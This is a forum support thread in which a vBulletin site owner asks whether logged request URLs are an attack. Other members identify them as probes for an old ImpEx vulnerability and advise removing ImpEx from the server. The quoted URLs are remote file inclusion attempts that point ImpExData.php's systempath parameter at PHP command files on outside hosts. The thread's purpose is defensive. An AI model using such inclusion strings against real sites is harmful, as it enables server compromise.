While i see Who is online page, i saw this link one quest.

.................................com/forum.php/impex/ImpExData.php?systempath=http://www.cpper.com/c/vbgsitemap/cmd.txt?

http://www.cpper.com/c/vbgsitemap/cmd.txt file include php code..

is this codes harmful? or hackers method?

It is someone checking for vulnerabilities. If you have kept your versions up2date, this is nothing to worry about.

It is someone checking for vulnerabilities. If you have kept your versions up2date, this is nothing to worry about.

Thanks marco..

I'm using Vbulletin 3.6.8 and vBadvanced CMPS v3.0 RC1.

can i need any update?

You are already running the latest vBulletin. Just make sure you don't have an old (remove or upgrade if needed) of ImpEx on your server.

I don't know about vBadvanced, but the attempt was not addressing vBA.

I saw again smiliar links:
..................com/forum.php/impex/clientscript/vbulletin_read_marker.js?v=368and
.........................com/forum.php//impex/ImpExData.php? systempath=http://futurehousingsystems.com/images/control.txt?
if this links harmfull or hackers method we will happy your report ...

if you havent "installed" impex(removed it after importing) nothing can happen

the person/robot who visit your site with this script is someone willing to verify if you have ImpEx installed... lately, there was some insert/exploits compromissing the presence of ImpEx in your forum... btw, you should be safe as you do not have it installed.

lately??

The latest vulnerability in ImpEx was a 1-time error i think over a year ago. See also https://vborg.vbsupport.ru/showpost.php?p=1346977&postcount=13

lately can be one year old, remember that people are not updating their ImpEx the same way they change their underwears...

In any case, you shouldn't have impex on your server unless you're actively importing or exporting something. If not, remove it.